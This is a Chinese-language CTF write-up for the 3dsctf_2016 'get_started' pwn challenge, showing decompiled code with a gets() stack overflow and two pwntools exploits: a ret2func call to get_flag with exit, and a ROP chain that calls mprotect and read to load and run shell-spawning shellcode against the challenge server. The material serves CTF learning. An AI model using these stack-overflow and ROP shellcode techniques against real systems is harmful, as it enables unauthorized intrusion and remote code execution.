pwn----作題記錄_get_started_3dsctf_2016

emmm最近一直埋頭於csapp，作一道題回憶回憶之前作的。這道題太大了，在main函數上方有個get_flag函數。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [esp+4h] [ebp-38h]

  printf("Qual a palavrinha magica? ", v4);
  gets(&v4);
  return 0;
}

void __cdecl get_flag(int a1, int a2)
{
  int v2; // eax
  int v3; // esi
  unsigned __int8 v4; // al
  int v5; // ecx
  unsigned __int8 v6; // al

  if ( a1 == 814536271 && a2 == 425138641 )
  {
    v2 = fopen("flag.txt", "rt");
    v3 = v2;
    v4 = getc(v2);
    if ( v4 != 255 )
    {
      v5 = (char)v4;
      do
      {
        putchar(v5);
        v6 = getc(v3);
        v5 = (char)v6;
      }
      while ( v6 != 255 );
    }
    fclose(v3);
  }
}

漏洞是典型的棧溢出。須要咱們進行填寫。最開始向直接跳入get_flag函數，結果不能正確獲得結果。看了看其餘大佬的EXP，發現要有什麼限制，必須維護好棧，因此地找一個函數來退出。因而利用了exit函數

exp

from pwn import *

context(os="linux", arch="i386", log_level="debug")
sh = process("./hhh")

flag_addr = 0x080489A0

# 0x0804E6A0爲exit地址
payload = cyclic(0x38) + p32(0x080489A0) + p32(0x0804E6A0)
#後面倆個對應的是函數參數
payload += p32(0x308CD64F) + p32(0x195719D1)
sh.sendline(payload)
sh.recv()
#注意main函數沒有push ebp

另一個大佬的ROP利用
這裏利用了一個後門函數
![上傳中...]()

exp

from pwn import *
#coding = utf-8

context(os="linux", arch="i386", log_level="debug")
q = remote('node3.buuoj.cn',25023)
elf = ELF("./hhh")

mprotect_addr = elf.symbols["mprotect"]
read_addr = elf.symbols["read"]
start_addr = 0x80ea000
pop_3 = 0x0804f460

payload = cyclic(0x38)
payload += p32(mprotect_addr)
payload += p32(pop_3)
payload += p32(start_addr)
payload += p32(0x1000)
payload += p32(0x7) #7具備rwxp
payload += p32(read_addr)
payload += p32(pop_3)
payload += p32(0)
payload += p32(start_addr)
payload += p32(0x100)
payload += p32(start_addr)
shellcode = asm(shellcraft.sh())

q.sendline(payload)
sleep(0.1)
q.sendline(shellcode)
q.interactive()